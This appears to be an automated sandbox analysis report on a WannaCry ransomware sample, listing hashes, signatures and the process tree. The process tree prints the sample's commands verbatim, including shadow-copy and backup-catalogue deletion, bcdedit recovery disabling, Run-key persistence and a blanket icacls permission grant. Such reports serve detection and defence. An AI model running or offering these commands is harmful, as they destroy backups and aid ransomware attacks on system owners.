Analysis
-
max time kernel
1s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
07/01/2024, 19:42
Static task
static1
1 signatures
10 signatures
150 seconds
7 signatures
150 seconds
General
-
Target
-
Size
3.4MB
-
MD5
84c82835a5d21bbcf75a61706d8ab549
-
SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
-
SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
-
SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
-
SSDEEP
98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
Score
10/10
Malware Config
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 1 IoCs
pid Process 2348 taskdl.exe -
Loads dropped DLL 2 IoCs
pid Process 2504 [email protected] 2504 [email protected] -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2800 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1332 vssadmin.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2712 reg.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2504 wrote to memory of 2908 2504 [email protected] 15 PID 2504 wrote to memory of 2908 2504 [email protected] 15 PID 2504 wrote to memory of 2908 2504 [email protected] 15 PID 2504 wrote to memory of 2908 2504 [email protected] 15 PID 2504 wrote to memory of 2800 2504 [email protected] 25 PID 2504 wrote to memory of 2800 2504 [email protected] 25 PID 2504 wrote to memory of 2800 2504 [email protected] 25 PID 2504 wrote to memory of 2800 2504 [email protected] 25 PID 2504 wrote to memory of 2348 2504 [email protected] 16 PID 2504 wrote to memory of 2348 2504 [email protected] 16 PID 2504 wrote to memory of 2348 2504 [email protected] 16 PID 2504 wrote to memory of 2348 2504 [email protected] 16 PID 2504 wrote to memory of 2136 2504 [email protected] 19 PID 2504 wrote to memory of 2136 2504 [email protected] 19 PID 2504 wrote to memory of 2136 2504 [email protected] 19 PID 2504 wrote to memory of 2136 2504 [email protected] 19 PID 2136 wrote to memory of 2872 2136 cmd.exe 18 PID 2136 wrote to memory of 2872 2136 cmd.exe 18 PID 2136 wrote to memory of 2872 2136 cmd.exe 18 PID 2136 wrote to memory of 2872 2136 cmd.exe 18 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2908 attrib.exe 1612 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\[email protected]"C:\Users\Admin\AppData\Local\Temp\[email protected]"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
PID:2908
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:2348
-
-
C:\Windows\SysWOW64\cmd.execmd /c 251131704656600.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2136
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE2⤵
- Views/modifies file attributes
PID:1612
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2800
-
-
C:\Windows\SysWOW64\cmd.exePID:896
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:1476
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵PID:836
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵PID:2796
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nnzzsvcjqe067" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f2⤵PID:3004
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:2904
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exePID:2808
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵PID:2148
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exePID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:1508
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵PID:1012
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exePID:1640
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵PID:868
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:1988
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exePID:1504
-
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs1⤵PID:2872
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:2084
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵PID:904
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1332
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete1⤵PID:1988
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:3064
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nnzzsvcjqe067" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f1⤵
- Modifies registry key
PID:2712